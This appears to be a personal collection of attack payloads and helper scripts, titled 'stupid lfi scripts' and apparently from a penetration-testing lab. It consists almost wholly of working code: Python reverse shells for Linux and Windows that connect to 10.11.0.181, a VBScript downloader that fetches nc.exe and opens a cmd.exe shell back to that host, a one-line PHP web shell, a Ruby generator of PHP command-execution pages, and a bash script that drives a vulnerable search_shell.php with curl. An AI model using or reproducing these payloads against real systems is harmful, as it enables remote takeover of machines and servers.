stupid lfi scripts

payload_enum_win_transfer_software

for %i in (ruby python ftp debug wscript cscript powershell javac) do where %i

payload_python_reverse_shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.181",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

payload_python_reverse_shell_win

echo import os,socket,subprocess,threading; > prs.py
echo def s2p(s, p): >> prs.py
echo     while True: >> prs.py
echo         data = s.recv(1024) >> prs.py
echo         if len(data) ^> 0: >> prs.py
echo             p.stdin.write(data) >> prs.py
echo.  >> prs.py
echo def p2s(s, p): >> prs.py
echo     while True: >> prs.py
echo         s.send(p.stdout.read(1)) >> prs.py
echo.  >> prs.py
echo s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) >> prs.py
echo s.connect(("10.11.0.181",4441)) >> prs.py
echo.  >> prs.py
echo p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) >> prs.py
echo.  >> prs.py
echo s2p_thread = threading.Thread(target=s2p, args=[s, p]) >> prs.py
echo s2p_thread.daemon = True >> prs.py
echo s2p_thread.start() >> prs.py
echo.  >> prs.py
echo p2s_thread = threading.Thread(target=p2s, args=[s, p]) >> prs.py
echo p2s_thread.daemon = True >> prs.py
echo p2s_thread.start() >> prs.py
echo.  >> prs.py
echo try: >> prs.py
echo     p.wait() >> prs.py
echo except KeyboardInterrupt: >> prs.py
echo     s.close() >> prs.py
python prs.py

payload_vbs_nc_reverse_win

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
wget.vbs http://10.11.0.181:8000/nc.exe nc.exe
nc.exe -n 10.11.0.181 4443 -e cmd.exe

payload_webshell_php_win

echo ^<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;  }?^> > ws.php

payload_wget_vbs_win

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

phpify

#!/usr/bin/env ruby


def run
  source, destination = ARGV
  unless source and File.exist?(source) and destination
    puts "usage: #{__FILE__} <source> <output>"
    exit 1
  end

  File.open(destination, 'w') {|f| f << template(File.read(source).lines.to_a)}

end

def template stuff
  """
<?php
  $to_execute = array(
#{stuff.map{|s| "    '" + s.chomp() +"'"}.join(",\n")}
  );

  foreach( $to_execute as $cmd )
  {
    echo shell_exec($cmd);
  }
?>
  """

end

run if __FILE__ == $0

web_shell.sh

#!/bin/bash 

file=$1
shell_eval_command="cmd"

exploitable_url="http://10.11.0.0/search_shell.php?"

# thanks stack overflow
rawurlencode() {
  local string="${1}"
  local strlen=${#string}
  local encoded=""
  local pos c o

  for (( pos=0 ; pos<strlen ; pos++ )); do
     c=${string:$pos:1}
     case "$c" in
        [-_.~a-zA-Z0-9] ) o="${c}" ;;
        * )               printf -v o '%%%02x' "'$c"
     esac
     encoded+="${o}"
  done
  echo "${encoded}"    # You can either set a return variable (FASTER) 
  REPLY="${encoded}"   #+or echo the result (EASIER)... or both... :p
}

cat $file |  while read line; do 
	encoded_line=`rawurlencode "$line"`
	url="$exploitable_url&$shell_eval_command=$encoded_line"
	echo "cmd : $url"
	curl -s -o /dev/null -D - --get "$url" | head -n 1
done